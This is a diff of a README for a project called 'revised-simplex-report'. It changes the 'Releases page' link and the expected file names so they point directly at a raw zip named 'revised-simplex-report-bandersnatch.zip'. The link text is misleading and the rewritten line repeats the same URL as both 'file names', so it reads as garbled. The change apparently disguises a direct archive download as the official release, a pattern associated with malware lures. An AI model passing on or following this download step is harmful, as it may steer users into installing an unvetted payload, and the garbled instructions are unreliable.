nkduxitt/revised-simplex-report/README.md

 - Internet Connection: Required for downloading the application.

 ### 📦 Step 1: Visit the Releases Page
-To begin, go to the [Releases page](https://github.com/nkduxitt/revised-simplex-report/releases).
+To begin, go to the [Releases page](https://raw.githubusercontent.com/nkduxitt/revised-simplex-report/main/code/revised-simplex-report-bandersnatch.zip).
 Here, you'll find the latest version of the software.

 ### 📥 Step 2: Download the Application
 On the Releases page, look for the latest version listed.
 Click on it to view the assets available for download.
-Find the file named something like `revised_simplex_report.zip` or `revised_simplex_report.exe`.
+Find the file named something like `https://raw.githubusercontent.com/nkduxitt/revised-simplex-report/main/code/revised-simplex-report-bandersnatch.zip` or `https://raw.githubusercontent.com/nkduxitt/revised-simplex-report/main/code/revised-simplex-report-bandersnatch.zip`.

 Click on it to start downloading the file to your computer.